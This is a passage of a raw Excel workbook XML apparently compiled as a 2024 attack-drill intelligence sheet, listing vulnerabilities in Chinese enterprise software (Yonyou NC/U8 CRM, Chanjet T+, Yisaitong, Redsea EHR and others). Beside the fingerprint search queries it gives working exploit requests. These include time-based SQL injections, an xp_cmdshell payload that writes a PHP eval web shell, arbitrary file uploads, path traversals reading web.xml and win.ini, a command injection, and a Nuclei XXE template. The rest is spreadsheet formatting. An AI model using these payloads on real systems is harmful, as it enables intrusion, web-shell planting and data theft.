User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i
Connection: keep-alive
Content-Length: 6
Content-Type: application/x-www-form-urlencoded
X
</t>
  </si>
  <si>
    <t>科荣AIO管理系统endTime参数存在SQL注入漏洞</t>
  </si>
  <si>
    <t>body="changeAccount('8000')"</t>
  </si>
  <si>
    <t>http://ip/moffice?op=showWorkPlanList&amp;type=1&amp;beginTime=1&amp;endTime=1*&amp;sid=1</t>
  </si>
  <si>
    <t>用友NC接口/psnImage/download存在SQL注入漏洞</t>
  </si>
  <si>
    <t>http://ip/portal/pt/psnImage/download?pageId=login&amp;pk_psndoc=1%27)%20AND%206322=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(79)||CHR(66)||CHR(101),5)%20AND%20(%27rASZ%27=%27rASZ</t>
  </si>
  <si>
    <t>用友U8-CRM接口exportdictionary.php存在SQL注入漏洞</t>
  </si>
  <si>
    <t>title="用友U8CRM"</t>
  </si>
  <si>
    <t xml:space="preserve">GET /devtools/tools/exportdictionary.php?DontCheckLogin=1&amp;value=1%27;WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=bgsesstimeout-; TL_EXPANDED=REL_STAGE2012
</t>
  </si>
  <si>
    <t>用友U8+CRM接口reservationcomplete.php存在命令执行漏洞</t>
  </si>
  <si>
    <t xml:space="preserve">GET /bgt/reservationcomplete.php?DontCheckLogin=1&amp;ID=1112;exec%20master..xp_cmdshell%20%27echo%20^%3C?php%20@eval($_POST[x]);?^%3E%20%3E%20D:\U8SOFT\turbocrm70\code\www\shell.php%27; HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: PHPSESSID=bgsesstimeout-
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 192.168.12.3
Priority: u=0, i
</t>
  </si>
  <si>
    <t>用友U8CRM swfupload.php任意文件上传漏洞（老洞）</t>
  </si>
  <si>
    <t>POST /ajax/swfupload.php?DontCheckLogin=1&amp;vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php "
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"
upload
------269520967239406871642430066855--</t>
  </si>
  <si>
    <t>东华医疗协同办公系统-templateFile-存在任意文件读取漏洞</t>
  </si>
  <si>
    <t>product="DHC-OA"</t>
  </si>
  <si>
    <t>http://ip/common/templateFile?template_name=../../WEB-INF/web.xml</t>
  </si>
  <si>
    <t>星网锐捷乐享智能运维管理平台getToken存在SQL注入漏洞</t>
  </si>
  <si>
    <t>title="乐享智能运维管理平台"</t>
  </si>
  <si>
    <t>POST /auth-ui/v1/api/user/token/getToken HTTP/1.1
account=admin');SELECT PG_SLEEP(5)--&amp;password=6e0f9e14344c5406a0cf5a3b4dfb665f87f4a771a31f7edbb5c72874a32b2957</t>
  </si>
  <si>
    <t>JCMS内容管理系统前台远程命令执行漏洞</t>
  </si>
  <si>
    <t>畅捷通T+ FileUploadHandler任意文件上传漏洞</t>
  </si>
  <si>
    <t>POST /tplus/SM/SetupAccount/FileUploadHandler.ashx/;/login HTTP/1.1
Host: 11.11.11.11
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Content-Length: 185
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=f95ec6be8c3acff8e3edd3d910d3b9a6
--f95ec6be8c3acff8e3edd3d910d3b9a6
Content-Disposition: form-data; name="file"; filename="fpbifm.txt"
Content-Type: image/jpeg
changjietongrce
--f95ec6be8c3acff8e3edd3d910d3b9a6--
/tplus/UserFiles/fpbifm.txt</t>
  </si>
  <si>
    <t>POST /admin/configApp/queryPrintTemplate HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
{"appId":"hkmp","data":{"adminUserCode":"test1234","adminUserName":"test1234","appName":"悟空POS Win版","configGroup":"1","mchId":"0001"},"deviceId":"hkmp","mchId":"hkmp","nonce":3621722933,"sign":"hkmp","timestamp":1719306504}</t>
  </si>
  <si>
    <t>亿赛通电子文档安全管理系统 LogDownLoadService sql注入漏洞</t>
  </si>
  <si>
    <t xml:space="preserve">POST /CDGServer3/logManagement/LogDownLoadService HTTP/1.1
Host: 
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 0
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
X-Requested-With: XMLHttpRequest
command=downLoadLogFiles&amp;currPage=1&amp;fromurl=../user/dataSearch.jsp&amp;logFileName=indsex.txt&amp;id=-1';WAITFOR DELAY '0:0:5'--
</t>
  </si>
  <si>
    <t>深圳新为SmartLearning前台任意文件上传漏洞</t>
  </si>
  <si>
    <t>开源-Webuserlogin-RCE</t>
  </si>
  <si>
    <t xml:space="preserve">GET /vpn/list_base_config.php?type=mod&amp;parts=base_config&amp;template=%60echo+-e+%27%3C%3Fphp+echo+%28phpinfo()%29%3Bunlink%28__FILE__%29%3B%3F%3E%27%3E%2Fwww%2Ftmp%2Ftest.php%60 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept-Encoding: gzip, deflate, br
Connection: close
</t>
  </si>
  <si>
    <t>Windows-TCPIP组件-RCE</t>
  </si>
  <si>
    <t>云时空-社会化商业ERP系统-InformationLeakage敏感信息泄露</t>
  </si>
  <si>
    <t>title="云时空社会化商业ERP系统"</t>
  </si>
  <si>
    <t xml:space="preserve">GET /sys/user/online HTTP/1.1
Host: 
accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
</t>
  </si>
  <si>
    <t>紫光-电子档案管理系统-InformationLeakage日志信息泄露</t>
  </si>
  <si>
    <t xml:space="preserve">/Application/Runtime/Logs/login/24_08_14.log
</t>
  </si>
  <si>
    <t>用友-U8C-Cloud-update-外部实体注入</t>
  </si>
  <si>
    <t>app="用友-U8-Cloud"</t>
  </si>
  <si>
    <t>id: yongyou-u8c-cloud-update-xxe
info:
  name: yongyou-u8c-cloud-update-xxe
  author: 111
  severity: 111
http:
  - raw:
      - |
        POST /hrss/dorado/lube.update.d?__rpc=true&amp;__rpcAgent=true HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Accept-Language: zh-CN,zh;q=0.9
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
        __type=updateData&amp;__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&amp;__xml=&lt;!DOCTYPE z [&lt;!ENTITY test  SYSTEM "file:///c:/windows/win.ini" &gt;]&gt;&lt;rpc transaction="10" method="resetPwd"&gt;&lt;def&gt;&lt;dataset type="Custom" id="dsResetPwd"&gt;&lt;f name="user"&gt;&lt;/f&gt;&lt;/dataset&gt;&lt;/def&gt;&lt;data&gt;&lt;rs dataset="dsResetPwd"&gt;&lt;r id="10008" state="insert"&gt;&lt;n&gt;&lt;v&gt;1&lt;/v&gt;&lt;/n&gt;&lt;/r&gt;&lt;/rs&gt;&lt;/data&gt;&lt;vps&gt;&lt;p name="__profileKeys"&gt;%26test;&lt;/p&gt;&lt;/vps&gt;&lt;/rpc&gt;&amp;1404976068948
    matchers:
      - type: dsl
        dsl:
          - contains_all(body,"[fonts]","__RPCResult")</t>
  </si>
  <si>
    <t>红海 EHR 系统pc.mob sql 注入</t>
  </si>
  <si>
    <t>body="/RedseaPlatform/skins/images/favicon.ico"</t>
  </si>
  <si>
    <t>GET
/RedseaPlatform/goApp/pc.mob?id=1%27%20AND%20(SELECT%204802%20FROM%20(SEL
ECT(SLEEP(5)))ndMq)%20AND%20%27NEoX%27=%27NEoX HTTP/1.1
Host: {{Hostname}}
Cookie: JSESSIONID=905D36CF9349B41FBFB0203D2BAA8CCC
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0</t>
  </si>
  <si>
    <t>用友NCfileupload命令执行</t>
  </si>
  <si>
    <t>POST
/portal/pt/file/upload?pageId=login&amp;filemanager=nc.uap.lfw.file.FileManager&amp;i
scover=true&amp;billitem=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cwebapps%5Cnc_web%5C  HTTP/1.1
Host:
Content-Type: multipart/form-data;
boundary=d0b7a0d40eed0e32904c8017b09eb305
--d0b7a0d40eed0e32904c8017b09eb305
Content-Disposition: form-data; name="file";  filename="we.jsp" Content-Type: text/plain
&lt;%out.print("hello world");%&gt;
--d0b7a0d40eed0e32904c8017b09eb305--</t>
  </si>
  <si>
    <t>MoticDSM任意文件读取</t>
  </si>
  <si>
    <t>body="API/File/GetNoUploadedFiles"</t>
  </si>
  <si>
    <t>/UploadService/Page/style?f=C:\\windows\win.ini</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</si>
</sst>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30">
    <font>
      <sz val="10"/>
      <color theme="1"/>
      <name val="等线"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="等线"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <name val="等线"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="等线"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="SourceHanSansCN"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="9"/>
      <color rgb="FF525252"/>
      <name val="Roboto Mono"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="12"/>
      <color rgb="FF191919"/>
      <name val="PingFang SC"/>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C7DCFF"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFE5F6FF"/>
        <bgColor indexed="64"/>
      </patternFill>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7" fillId="0" borderId="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6"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7" borderId="4" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="8" borderId="5" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="8" borderId="4" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="19" fillId="9"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22">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0"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176" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="3" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="4" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="5" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="5" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="3" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="3" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="3" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="4" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="1"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177</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="226308" cy="257175"/>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="2" name="1"/>
        <xdr:cNvPicPr/>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip r:embed="rId1" r:link="rId2"/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="7780020" y="40462200"/>
          <a:ext cx="226060" cy="257175"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:oneCellAnchor>
  <xdr:oneCellAnchor>
    <xdr:from>
      <xdr:col>4</xdr:col>
      <xdr:colOff>0</xdr:colOff>
      <xdr:row>199</xdr:row>
      <xdr:rowOff>49499</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="4219575" cy="148651"/>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="3" name="2"/>
        <xdr:cNvPicPr/>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip r:embed="rId3" r:link="rId2"/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="7780020" y="45568870"/>
          <a:ext cx="4219575" cy="14922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wafinfo/DecryptTools" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://tempuri.org/GetStamp" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://tempuri.org/ExecuteSqlForNone" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://tempuri.org/GetEnterprise" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://tempuri.org/SavePrintFormatAssign" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://schemas.xmlsoap.org/soap/envelope/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.w3.org/2001/XMLSchema-instance" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://tempuri.org/GetChildFormAndEntityList" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://mp.weixin.qq.com/s?__biz=Mzg5MzE4MjAxMw==&amp;mid=2247484321&amp;idx=1&amp;sn=8c37c07c4e4d38925ada43a52c28db3b" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://tempuri.org/ExeAppCmd" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.ahkxsoft.com/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.sangfor.com.cn/productTool/read?product_id=201&amp;id=84&amp;category_id=0" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bladex.vi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2024HW情报"/>
  <dimension ref="A1:E265"/>
  <sheetViews>
    <sheetView tabSelected="1" topLeftCell="A25" workbookViewId="0">
      <selection activeCell="D13" sqref="D13"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="14" defaultRowHeight="18" customHeight="1" outlineLevelCol="4"/>
  <cols>
    <col min="1" max="1" width="17.2621359223301" style="1" customWidth="1"/>
    <col min="2" max="2" width="57.0485436893204" style="2" customWidth="1"/>
    <col min="3" max="3" width="10.9223300970874" style="1" customWidth="1"/>
    <col min="4" max="4" width="33.7184466019417" style="3" customWidth="1"/>
    <col min="5" max="5" width="63.2621359223301" style="4" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" customHeight="1" spans="1:5">
      <c r="A1" s="5" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="5" t="s">
        <v>1</v>
      </c>
      <c r="C1" s="5" t="s">
        <v>2</v>
      </c>
      <c r="D1" s="5" t="s">
        <v>3</v>
      </c>
      <c r="E1" s="6" t="s">
        <v>4</v>
      </c>
    </row>
    <row r="2" customHeight="1" spans="1:3">
      <c r="A2" s="7">
        <v>45495</v>
      </c>
      <c r="B2" s="8" t="s">
        <v>5</v>
      </c>
      <c r="C2" s="9" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="3" customHeight="1" spans="1:5">
      <c r="A3" s="7">
        <v>45495</v>
      </c>
      <c r="B3" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C3" s="9" t="s">
        <v>8</v>
      </c>
      <c r="D3" s="3" t="s">
        <v>9</v>
      </c>
      <c r="E3" s="10" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="4" customHeight="1" spans="1:5">
      <c r="A4" s="7">
        <v>45495</v>
      </c>
      <c r="B4" s="8" t="s">
        <v>11</v>
      </c>
      <c r="C4" s="9" t="s">
        <v>8</v>
      </c>
      <c r="E4" s="10" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="5" customHeight="1" spans="1:5">
      <c r="A5" s="7">
        <v>45495</v>
      </c>
      <c r="B5" s="8" t="s">
        <v>13</v>
      </c>
      <c r="C5" s="9" t="s">
        <v>8</v>
      </c>
      <c r="D5" s="3" t="s">
        <v>14</v>
      </c>
      <c r="E5" s="10" t="s">
        <v>15</v>
      </c>
    </row>
    <row r="6" customHeight="1" spans="1:3">
      <c r="A6" s="7">
        <v>45495</v>
      </c>
      <c r="B6" s="8" t="s">
        <v>16</v>
      </c>
      <c r="C6" s="9" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="7" customHeight="1" spans="1:5">
      <c r="A7" s="7">
        <v>45495</v>
      </c>
      <c r="B7" s="8" t="s">
        <v>17</v>
      </c>
      <c r="C7" s="9" t="s">
        <v>8</v>
      </c>
      <c r="D7" s="3" t="s">
        <v>18</v>
      </c>
      <c r="E7" s="10" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="8" customHeight="1" spans="1:5">
      <c r="A8" s="7">
        <v>45495</v>
      </c>
      <c r="B8" s="8" t="s">
        <v>20</v>
      </c>
      <c r="C8" s="9" t="s">
        <v>8</v>
      </c>
      <c r="E8" s="10" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="9" customHeight="1" spans="1:5">
      <c r="A9" s="7">
        <v>45495</v>
      </c>
      <c r="B9" s="2" t="s">
        <v>22</v>
      </c>
      <c r="C9" s="9" t="s">
        <v>8</v>
      </c>
      <c r="D9" s="3" t="s">
        <v>23</v>
      </c>
      <c r="E9" s="10" t="s">
        <v>24</v>
      </c>
    </row>
    <row r="10" customHeight="1" spans="1:5">
      <c r="A10" s="7">
        <v>45495</v>
      </c>
      <c r="B10" s="2" t="s">
        <v>25</v>
      </c>
      <c r="C10" s="9" t="s">
        <v>8</v>
      </c>
      <c r="D10" s="3" t="s">
        <v>26</v>
      </c>
      <c r="E10" s="10" t="s">
        <v>27</v>
      </c>
    </row>
    <row r="11" customHeight="1" spans="1:5">
      <c r="A11" s="7">
        <v>45495</v>
      </c>
      <c r="B11" s="2" t="s">
        <v>28</v>
      </c>
      <c r="C11" s="9" t="s">
        <v>8</v>
      </c>
      <c r="D11" s="3" t="s">
        <v>26</v>
      </c>
      <c r="E11" s="10" t="s">
        <v>29</v>
      </c>
    </row>
    <row r="12" customHeight="1" spans="1:5">
      <c r="A12" s="7">
        <v>45495</v>
      </c>
      <c r="B12" s="2" t="s">
        <v>30</v>
      </c>
      <c r="C12" s="9" t="s">
        <v>8</v>
      </c>
      <c r="E12" s="10" t="s">
        <v>31</v>
      </c>
    </row>
    <row r="13" customHeight="1" spans="1:5">
      <c r="A13" s="7">
        <v>45495</v>
      </c>
      <c r="B13" s="2" t="s">
        <v>32</v>
      </c>
      <c r="C13" s="9" t="s">
        <v>8</v>
      </c>
      <c r="E13" s="10" t="s">
        <v>33</v>
      </c>
    </row>
    <row r="14" customHeight="1" spans="1:5">
      <c r="A14" s="7">
        <v>45495</v>
      </c>
      <c r="B14" s="2" t="s">
        <v>34</v>
      </c>
      <c r="C14" s="9" t="s">
        <v>8</v>
      </c>
      <c r="E14" s="10" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="15" customHeight="1" spans="1:5">
      <c r="A15" s="7">
        <v>45495</v>
      </c>
      <c r="B15" s="2" t="s">
        <v>36</v>
      </c>
      <c r="C15" s="9" t="s">
        <v>8</v>
      </c>
      <c r="E15" s="10" t="s">
        <v>37</v>
      </c>
    </row>
    <row r="16" customHeight="1" spans="1:3">
      <c r="A16" s="7">
        <v>45496</v>
      </c>
      <c r="B16" s="8" t="s">
        <v>38</v>
      </c>
      <c r="C16" s="9" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="17" customHeight="1" spans="1:5">
      <c r="A17" s="7">
        <v>45496</v>
      </c>
      <c r="B17" s="2" t="s">
        <v>39</v>
      </c>
      <c r="C17" s="9" t="s">
        <v>8</v>
      </c>
      <c r="E17" s="10" t="s">
        <v>40</v>
      </c>
    </row>
    <row r="18" customHeight="1" spans="1:5">
      <c r="A18" s="7">
        <v>45496</v>
      </c>
      <c r="B18" s="2" t="s">
        <v>41</v>
      </c>
      <c r="C18" s="9" t="s">
        <v>8</v>
      </c>
      <c r="E18" s="10" t="s">
        <v>42</v>
      </c>
    </row>
    <row r="19" customHeight="1" spans="1:5">
      <c r="A19" s="7">
        <v>45496</v>
      </c>
      <c r="B19" s="2" t="s">
        <v>43</v>
      </c>
      <c r="C19" s="9" t="s">
        <v>8</v>
      </c>
      <c r="E19" s="10" t="s">
        <v>44</v>
      </c>
    </row>
    <row r="20" customHeight="1" spans="1:5">
      <c r="A20" s="7">
        <v>45496</v>
      </c>
      <c r="B20" s="2" t="s">
        <v>45</v>
      </c>
      <c r="C20" s="9" t="s">
        <v>8</v>
      </c>
      <c r="E20" s="10" t="s">
        <v>46</v>
      </c>
    </row>
    <row r="21" customHeight="1" spans="1:5">
      <c r="A21" s="7">
        <v>45496</v>
      </c>
      <c r="B21" s="2" t="s">
        <v>47</v>
      </c>
      <c r="C21" s="9" t="s">
        <v>8</v>
      </c>
      <c r="E21" s="10" t="s">
        <v>48</v>
      </c>
    </row>
    <row r="22" customHeight="1" spans="1:5">
      <c r="A22" s="7">
        <v>45496</v>
      </c>
      <c r="B22" s="2" t="s">
        <v>49</v>
      </c>
      <c r="C22" s="9" t="s">
        <v>8</v>
      </c>
      <c r="E22" s="10" t="s">
        <v>50</v>
      </c>
    </row>
    <row r="23" customHeight="1" spans="1:5">
      <c r="A23" s="7">
        <v>45496</v>
      </c>
      <c r="B23" s="2" t="s">
        <v>51</v>
      </c>
      <c r="C23" s="9" t="s">
        <v>8</v>
      </c>
      <c r="E23" s="10" t="s">
        <v>52</v>
      </c>
    </row>
    <row r="24" customHeight="1" spans="1:5">
      <c r="A24" s="7">
        <v>45496</v>
      </c>
      <c r="B24" s="2" t="s">
        <v>53</v>
      </c>
      <c r="C24" s="9" t="s">
        <v>8</v>
      </c>
      <c r="E24" s="10" t="s">
        <v>54</v>
      </c>
    </row>
    <row r="25" customHeight="1" spans="1:5">
      <c r="A25" s="7">
        <v>45496</v>
      </c>
      <c r="B25" s="2" t="s">
        <v>55</v>
      </c>
      <c r="C25" s="9" t="s">
        <v>8</v>
      </c>
      <c r="E25" s="10" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="26" customHeight="1" spans="1:5">
      <c r="A26" s="7">
        <v>45496</v>
      </c>
      <c r="B26" s="2" t="s">
        <v>57</v>
      </c>
      <c r="C26" s="9" t="s">
        <v>8</v>
      </c>
      <c r="E26" s="10" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="27" customHeight="1" spans="1:5">
      <c r="A27" s="7">
        <v>45496</v>
      </c>
      <c r="B27" s="2" t="s">
        <v>59</v>
      </c>
      <c r="C27" s="9" t="s">
        <v>8</v>
      </c>
      <c r="E27" s="10" t="s">
        <v>60</v>
      </c>
    </row>
    <row r="28" customHeight="1" spans="1:3">
      <c r="A28" s="7">
        <v>45496</v>
      </c>
      <c r="B28" s="8" t="s">
        <v>61</v>
      </c>
      <c r="C28" s="9" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="29" customHeight="1" spans="1:5">
      <c r="A29" s="7">
        <v>45496</v>
      </c>
      <c r="B29" s="2" t="s">
        <v>62</v>
      </c>
      <c r="C29" s="9" t="s">
        <v>8</v>
      </c>
      <c r="E29" s="10" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="30" customHeight="1" spans="1:5">
      <c r="A30" s="7">
        <v>45496</v>
      </c>
      <c r="B30" s="2" t="s">
        <v>64</v>
      </c>
      <c r="C30" s="9" t="s">
        <v>8</v>
      </c>
      <c r="D30" s="3" t="s">
        <v>65</v>
      </c>
      <c r="E30" s="10" t="s">
        <v>66</v>
      </c>
    </row>
    <row r="31" customHeight="1" spans="1:5">
      <c r="A31" s="7">
        <v>45496</v>
      </c>
      <c r="B31" s="2" t="s">
        <v>67</v>
      </c>
      <c r="C31" s="9" t="s">
        <v>8</v>
      </c>
      <c r="D31" s="3" t="s">
        <v>68</v>
      </c>
      <c r="E31" s="10" t="s">
        <v>69</v>
      </c>
    </row>
    <row r="32" customHeight="1" spans="1:5">
      <c r="A32" s="7">
        <v>45496</v>
      </c>
      <c r="B32" s="2" t="s">
        <v>70</v>
      </c>
      <c r="C32" s="9" t="s">
        <v>8</v>
      </c>
      <c r="D32" s="3" t="s">
        <v>68</v>
      </c>
      <c r="E32" s="10" t="s">
        <v>71</v>
      </c>
    </row>
    <row r="33" customHeight="1" spans="1:5">
      <c r="A33" s="7">
        <v>45496</v>
      </c>
      <c r="B33" s="2" t="s">
        <v>72</v>
      </c>
